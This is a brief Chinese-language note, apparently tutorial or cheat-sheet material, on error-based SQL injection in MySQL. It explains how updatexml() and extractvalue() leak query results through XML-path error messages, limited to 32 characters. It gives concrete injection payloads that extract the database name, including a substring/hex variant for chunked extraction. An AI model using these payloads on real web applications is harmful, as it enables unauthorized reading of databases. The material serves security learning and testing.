*通過updatexml報錯
and updatexml(1,payload,1)
同樣該語句對輸出的字符長度也做了限制,其最長輸出32位
並且該語句對payload的反悔類型也做了限制,只有在payload返回的不是xml格式才會生效
語法:updatexml(目標xml文檔,xml路徑,更新的內容)
*通過ExtractValue報錯
and extractvalue(1, payload)
輸出字符有長度限制,最長32位。
Extractvalue()函數語法:Extractvalue(目標xml文件,xml路徑)
Xml的路徑格式為/xx/xx/xx…,如果寫入其他格式,就會報錯,並且會返回我們寫入的非法格式的內容,這個非法格式的內容就是我們有要查詢的東西
Extractvalue(‘1’,concat(‘~’,(select database())) #
返回database()查詢的內容
截取前五位
Extractvalue(‘1’,concat(‘~’,substring(hex((select database()),1,5))))